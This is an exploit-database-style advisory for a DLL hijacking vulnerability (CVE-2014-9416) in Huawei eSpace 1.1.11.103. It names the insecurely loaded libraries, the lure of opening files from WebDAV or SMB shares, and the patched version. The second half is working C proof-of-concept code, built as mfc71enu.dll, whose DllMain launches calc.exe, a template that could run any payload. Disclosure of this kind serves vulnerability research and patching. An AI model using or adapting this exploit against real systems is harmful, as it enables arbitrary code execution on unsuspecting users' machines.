Huawei eSpace 1.1.11.103 DLL Hijacking

`/*  
  
Huawei eSpace Desktop DLL Hijacking Vulnerability  
  
  
Vendor: Huawei Technologies Co., Ltd.  
Product web page: https://www.huawei.com  
Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)  
  
Summary: Create more convenient Enhanced Communications (EC) services for your  
enterprise with this suite of products. Huawei’s EC Suite (ECS) solution combines  
voice, data, video, and service streams, and provides users with easy and secure  
access to their service platform from any device, in any place, at any time. The  
eSpace Meeting allows you to join meetings that support voice, data, and video  
functions using the PC client, the tablet client, or an IP phone, or in a meeting  
room with an MT deployed.  
  
Desc: eSpace suffers from a DLL Hijacking issue. The vulnerability is caused due  
to the application loading libraries (mfc71enu.dll, mfc71loc.dll, tcapi.dll and   
airpcap.dll) in an insecure manner. This can be exploited to load arbitrary libraries  
by tricking a user into opening a related application file (.html, .jpg, .png)  
located on a remote WebDAV or SMB share.  
  
Tested on: Microsoft Windows 7 Professional  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
  
19.08.2014  
  
Patched version: V200R003C00  
Vuln ID: HWPSIRT-2014-1153 and HWPSIRT-2014-1154  
CVE ID: CVE-2014-9416  
Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589  
  
*/  
  
  
// gcc -shared -o mfc71enu.dll exploit.c  
  
#include <windows.h>   
  
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)  
{  
exec();  
return 0;  
}  
  
int exec()  
{  
WinExec("calc.exe" , SW_NORMAL);  
return 0;  
}  
`